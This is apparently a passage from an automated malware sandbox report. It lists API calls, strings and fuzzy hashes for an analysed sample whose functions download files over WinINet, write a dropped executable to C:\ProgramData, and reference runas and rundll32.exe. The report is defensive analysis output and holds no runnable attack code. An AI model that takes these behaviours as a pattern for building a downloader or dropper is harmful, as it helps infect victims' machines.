                                                                                                                                            • __fassign.LIBCMT ref: 021177AB
                                                                                                                                            • WriteFile.KERNEL32(?,02103D40,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021177F3
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 02117833
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 021178DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            • Opcode ID: eafb416fabd52c576e64e5b09df7842b497485bc3c593586b614e5a75beb33a1
                                                                                                                                            • Instruction ID: 841725758be003ca183c754ce27a2cdfef12c021831b9f0c6bbbb196b0cc43b2
                                                                                                                                            • Opcode Fuzzy Hash: eafb416fabd52c576e64e5b09df7842b497485bc3c593586b614e5a75beb33a1
                                                                                                                                            • Instruction Fuzzy Hash: 21D17971D402589FDF15CFA8D880AEDFBB5AF48314F28417AE855BB381D730AA46CB64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,00403AF0,00000000), ref: 0041735F
                                                                                                                                            • __fassign.LIBCMT ref: 0041753E
                                                                                                                                            • __fassign.LIBCMT ref: 0041755B
                                                                                                                                            • WriteFile.KERNEL32(?,00403AF0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175A3
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004175E3
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041768F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            • Opcode ID: be274a939198ef22bbc0e4bf3e1db74088a8381b1d284a182586deaff3b97251
                                                                                                                                            • Instruction ID: 2887c3a552ed1fc2b06bfe8e5bf07c6bde8add9ac4243d38c689086ebbc0ae5f
                                                                                                                                            • Opcode Fuzzy Hash: be274a939198ef22bbc0e4bf3e1db74088a8381b1d284a182586deaff3b97251
                                                                                                                                            • Instruction Fuzzy Hash: 83D1AE71D052589FCF15CFA8C8809EDBBB5BF49314F28416AE815BB342D734AA86CF58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0210FF4B,0210FDB9,0210F6C7), ref: 0210FF62
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0210FF70
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0210FF89
                                                                                                                                            • SetLastError.KERNEL32(00000000,0210FF4B,0210FDB9,0210F6C7), ref: 0210FFDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction ID: 048ff8caadd677e863fbef17a25e1ba68ea60b85ea78292d0e6617784674260d
                                                                                                                                            • Opcode Fuzzy Hash: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction Fuzzy Hash: CB01473378D3215EA63437756CC6A6B2796EB0B774320033AF820808F5EFE108539548
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0040FCFB,0040FB69,0040F477), ref: 0040FD12
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD20
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD39
                                                                                                                                            • SetLastError.KERNEL32(00000000,0040FCFB,0040FB69,0040F477), ref: 0040FD8B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction ID: 8cc6dcbae44a2d52cf8c11f23be7c67a5e481590007d6c0e7033467faf16e6d0
                                                                                                                                            • Opcode Fuzzy Hash: 44332ddc1fb2f734544a2049ea0f1c617bc5890c4ea3a60d97565a33b3018a5e
                                                                                                                                            • Instruction Fuzzy Hash: 6C0124337093216EE63026766C85AA726A4EF0537A360023FF811656F2EFAE5C87514C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040DED0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DFF1
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004026A0,00000000,00000000,00000000), ref: 00402776
                                                                                                                                            • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?), ref: 00402783
                                                                                                                                            • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040278A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                                                                            • String ID: runas$rundll32.exe
                                                                                                                                            • API String ID: 1039963361-4081450877
                                                                                                                                            • Opcode ID: 632079711821d43c6ffd94068d311285de1374bb21d42eded8444c8ed2936e06
                                                                                                                                            • Instruction ID: 09392b5254e1645925be96854df3bf802cc6077f604ac9a376f359c2fefabc37
                                                                                                                                            • Opcode Fuzzy Hash: 632079711821d43c6ffd94068d311285de1374bb21d42eded8444c8ed2936e06
                                                                                                                                            • Instruction Fuzzy Hash: BF41E631210148ABEB18DF28CE89B8D3B66AF45305F94863AF909A72D1C77DD4C08B98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            • C:\ProgramData\M7WCJ84VE5TXJ0R4.exe, xrefs: 0211A5AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                            • API String ID: 0-2322989060
                                                                                                                                            • Opcode ID: f3947822aba8bb08784cc91c87d2ab758d579a1d2d6cee65828d2ade4eac22e4
                                                                                                                                            • Instruction ID: 3729e305706b1fbd1e323ae338cb18473f9b41a400a207d72232b8c067e30212
                                                                                                                                            • Opcode Fuzzy Hash: f3947822aba8bb08784cc91c87d2ab758d579a1d2d6cee65828d2ade4eac22e4
                                                                                                                                            • Instruction Fuzzy Hash: 3E21C371685215BFDB24AF658C80D6BBFAEEF003647114635F92997250E731EC40CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            • C:\ProgramData\M7WCJ84VE5TXJ0R4.exe, xrefs: 0041A35D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                            • API String ID: 0-2322989060
                                                                                                                                            • Opcode ID: 8ca4ff4ee348ea15c208bf2ad728796eb86287263020c82ad8f8fe69cf35f3be
                                                                                                                                            • Instruction ID: 8fcd5dcc9f5b01b07bd52fb12ed5abbccf50734b0b3ace7a73ab30f581ed808c
                                                                                                                                            • Opcode Fuzzy Hash: 8ca4ff4ee348ea15c208bf2ad728796eb86287263020c82ad8f8fe69cf35f3be
                                                                                                                                            • Instruction Fuzzy Hash: 6121C5712012157FDB20AF728C849EB77ACEF00368710462AF929C7251E778ECE1C76A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                            • Opcode ID: 43bfc6addb4ef82b3eba14085431bb7548137eca9168f827e0cbc0b6f077e910
                                                                                                                                            • Instruction ID: 58063f8b226cf6e6d1833e63b29625ed4d015e7c9e48810328c3890537844d72
                                                                                                                                            • Opcode Fuzzy Hash: 43bfc6addb4ef82b3eba14085431bb7548137eca9168f827e0cbc0b6f077e910
                                                                                                                                            • Instruction Fuzzy Hash: 49012F37B18237231A141219AC02BAB57998F91BB8727402FFA54F72C0FD5DEC82419C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 0-2084034818
                                                                                                                                            • Opcode ID: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction ID: 0d93d73468b09f87d9ef7135dd4aa8ebd36ada29da4d791985ae1a3ae0162fcd
                                                                                                                                            • Opcode Fuzzy Hash: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction Fuzzy Hash: EC11BC31B01225EBDB324B24FC44BAB7BA4AF49760B110122ED45A7350D6B4DDC186DD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00416612
                                                                                                                                            • GetLastError.KERNEL32(?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104,?), ref: 0041661C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00416623
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            • Opcode ID: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction ID: fe48760646ffff483df900e44d367c1fcd9bf12732390f7954c1140dc131ea13
                                                                                                                                            • Opcode Fuzzy Hash: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction Fuzzy Hash: D2F03132200115BB8B215BA6DC0899BFF6DFF453A03168526F51DC7521D736E8A2DBD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001), ref: 0041667B
                                                                                                                                            • GetLastError.KERNEL32(?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104), ref: 00416685
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041668C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            • Opcode ID: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction ID: 1982b7d424c97b4da265894f81eacb40b146a14d7fee0b0cb49c55dd075f62aa
                                                                                                                                            • Opcode Fuzzy Hash: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction Fuzzy Hash: EBF06231200515BBCB201F62CC04997FF69FF453A43124516F51DC7620C735E8A1DBD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004110B8,?,?,00411080,?,?,?), ref: 004110D8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004110EB
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,004110B8,?,?,00411080,?,?,?), ref: 0041110E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction ID: 89d1d6a6511906fb8b10b3cdba021d603bd2b1b5d6d269f4ed68b4bcbc4a5649
                                                                                                                                            • Opcode Fuzzy Hash: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction Fuzzy Hash: 94F0A730B00228FBCB21DB60EC09BDFBA78EF04756F520075FA00A1160DB758E01EB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004146EA
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 004146FD
                                                                                                                                            • _free.LIBCMT ref: 0041470E
                                                                                                                                            • _free.LIBCMT ref: 0041471F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID: Fg
                                                                                                                                            • API String ID: 776569668-2445576420
                                                                                                                                            • Opcode ID: ed6feafc550fa1065a8e86d3c97a65e9d970199be6f8b94e087475161f8d8b19
                                                                                                                                            • Instruction ID: c745ba60f97e2d4d87b6af78ea720ad5864cbd823f739a73dd20a150a1001671
                                                                                                                                            • Opcode Fuzzy Hash: ed6feafc550fa1065a8e86d3c97a65e9d970199be6f8b94e087475161f8d8b19
                                                                                                                                            • Instruction Fuzzy Hash: F9E09A75600624EB8B216F16FC419863A71FBC47153C2913AF81452231CB3905DB9FCD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 0210476D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(0042BD4C,00000000,00000000,00000000,00000000), ref: 0210601C
                                                                                                                                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0210603E
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 02106083
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen$ConnectHttpRequest
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3864186401-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02111985), ref: 02111A75
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02111ACF
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02111985,?,000000FF,00000000,00000000), ref: 02111B5D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02111B64
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02111BA1
                                                                                                                                              • Part of subcall function 02111DC9: __dosmaperr.LIBCMT ref: 02111DFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00411735), ref: 00411825
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041187F
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00411735,?,000000FF,00000000,00000000), ref: 0041190D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00411914
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00411951
                                                                                                                                              • Part of subcall function 00411B79: __dosmaperr.LIBCMT ref: 00411BAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00405C37
                                                                                                                                            • InternetReadFile.WININET(?,?,?,?), ref: 00405C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405C53
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405C62
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleInternet$File$ReadWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 567989605-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02105E15
                                                                                                                                            • InternetOpenA.WININET(0042BC85,00000000,00000000,00000000,00000000), ref: 02105E2A
                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02105E4A
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 02105E61
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02105EA3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$FileOpen$CloseCreateHandleRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2307989922-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0211B92E
                                                                                                                                              • Part of subcall function 02115711: HeapFree.KERNEL32(00000000,00000000,?,021147F3), ref: 02115727
                                                                                                                                              • Part of subcall function 02115711: GetLastError.KERNEL32(?,?,021147F3), ref: 02115739
                                                                                                                                            • _free.LIBCMT ref: 0211B940
                                                                                                                                            • _free.LIBCMT ref: 0211B952
                                                                                                                                            • _free.LIBCMT ref: 0211B964
                                                                                                                                            • _free.LIBCMT ref: 0211B976
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0041B6DE
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B6F0
                                                                                                                                            • _free.LIBCMT ref: 0041B702
                                                                                                                                            • _free.LIBCMT ref: 0041B714
                                                                                                                                            • _free.LIBCMT ref: 0041B726
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0210FB8F
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0210FC43
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 3480331319-3733052814
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(0042BD08,00000000,00000000,00000000,00000000), ref: 021025A1
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 021025B3
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 021025CA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$Open$FileRead
                                                                                                                                            • String ID: <
                                                                                                                                            • API String ID: 72386350-4251816714
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe$Fg
                                                                                                                                            • API String ID: 0-1132378746
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,agA), ref: 00416591
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000001,00000000,00000104,00000000,?,?,agA), ref: 004165C4
                                                                                                                                            • _free.LIBCMT ref: 004165E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$_free
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2913637552-2637427811
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
